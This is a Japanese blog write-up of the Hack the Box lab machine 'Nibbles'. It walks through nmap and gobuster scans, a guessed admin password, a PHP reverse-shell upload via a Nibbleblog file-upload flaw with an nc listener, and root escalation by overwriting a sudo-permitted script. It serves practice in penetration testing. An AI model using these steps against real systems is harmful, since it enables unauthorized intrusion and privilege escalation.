さんぽしの散歩記

【Hack the Box write-up】Nibbles

June 14, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は easy です

スクリーンショット 2020-06-14 15.33.29.png

評価が低いマシンでした。 ちなみに僕も「ん?」って感じました。

nmap

# Nmap 7.80 scan initiated Sun Jun 14 01:12:49 2020 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /home/kali/AutoRecon/results/10.10.10.75/scans/_quick_tcp_nmap.txt -oX /home/kali/AutoRecon/results/10.10.10.75/scans/xml/_quick_tcp_nmap.xml 10.10.10.75
Increasing send delay for 10.10.10.75 from 0 to 5 due to 13 out of 43 dropped probes since last increase.
Nmap scan report for 10.10.10.75
Host is up, received user-set (0.25s latency).
Scanned at 2020-06-14 01:12:50 EDT for 54s
Not shown: 998 closed ports![スクリーンショット 2020-06-14 15.27.54.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/417600/c70eda51-c6d3-4f29-95dc-356558d755a9.png)
![スクリーンショット 2020-06-14 15.27.46.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/417600/1ca9748c-0749-b0f4-8355-745b6e79c3a8.png)

Reason: 998 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 01:13:44 2020 -- 1 IP address (1 host up) scanned in 54.58 seconds

80 番

スクリーンショット 2020-06-14 15.27.54.png

スクリーンショット 2020-06-14 15.27.46.png

/nibbleblog/を開く

スクリーンショット 2020-06-14 15.32.02.png

nibbleblog のこの version には File Upload Vulnerability があります https://www.rapid7.com/db/modules/exploit/multi/http/nibbleblog_file_upload

gobuster

kali@kali:~$ gobuster dir -u http://10.10.10.75/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.75/nibbleblog/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/14 02:32:21 Starting gobuster
===============================================================
/index.php (Status: 200)
/sitemap.php (Status: 200)
/content (Status: 301)
/feed.php (Status: 200)
/themes (Status: 301)
/admin (Status: 301)
/admin.php (Status: 200)
/plugins (Status: 301)
/install.php (Status: 200)
/update.php (Status: 200)
/README (Status: 200)
/languages (Status: 301)
[ERROR] 2020/06/14 02:33:28 [!] Get http://10.10.10.75/nibbleblog/servlets.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/LICENSE.txt (Status: 200)
/COPYRIGHT.txt (Status: 200)
[ERROR] 2020/06/14 02:44:32 [!] Get http://10.10.10.75/nibbleblog/xFS.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/06/14 02:44:32 [!] Get http://10.10.10.75/nibbleblog/5260.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/06/14 02:44:32 [!] Get http://10.10.10.75/nibbleblog/News_Readers.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/06/14 03:13:08 [!] Get http://10.10.10.75/nibbleblog/prag: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/06/14 03:27:14 [!] Get http://10.10.10.75/nibbleblog/DWT-SpectacularRed.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/06/14 03:43:26 [!] Get http://10.10.10.75/nibbleblog/t10098.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/06/14 03:44:49 Finished
===============================================================

/admin.php 開く

Login のフォームが出てきます 他のページを割とくまなく探しましたが、credential が出てこず、数回 login 失敗するとブロックされるため hydra 等も使えません。 default credential も存在しないため、低評価であることから、まさかこれは guess か〜?と思ってぽちぽちしてたら、admin/nibbles で通りました。う〜んこれは厳しい…

(数回 login 失敗するとブロック →hydra 等使えない = bruteforce しなくてもどこかに credentials があるよって言うメッセージなんだろーな〜と思ったんですけどね…)(低評価の由縁はこれか〜)

さっきの File Upload Vulnerability

https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/

これを参考に以下の php の reverseshell のスクリプトを上げます https://github.com/pentestmonkey/php-reverse-shell

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.75] 55886
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:35:30 up  3:27,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler

shell が取れました

/home/nibbler/personal.zip

/home/nibbler/personal.zip を unzip します

nibbler@Nibbles:/home/nibbler$ find personal
find personal
personal
personal/stuff
personal/stuff/monitor.sh

monitor.sh と言うのが出てきます(中身はあんま関係ないので割愛

sudo -l

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

お 👀

monitor.sh を書き換え

nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "cat /root/root.txt" > monitor.sh
<er/personal/stuff$ echo "cat /root/root.txt" > monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -u root ./monitor.sh
sudo -u root ./monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
b6d745c*****************

root.txt が取れました

終わりに

う〜ん、login にそこそこの時間を費やしました… 精進します

このエントリーをはてなブックマークに追加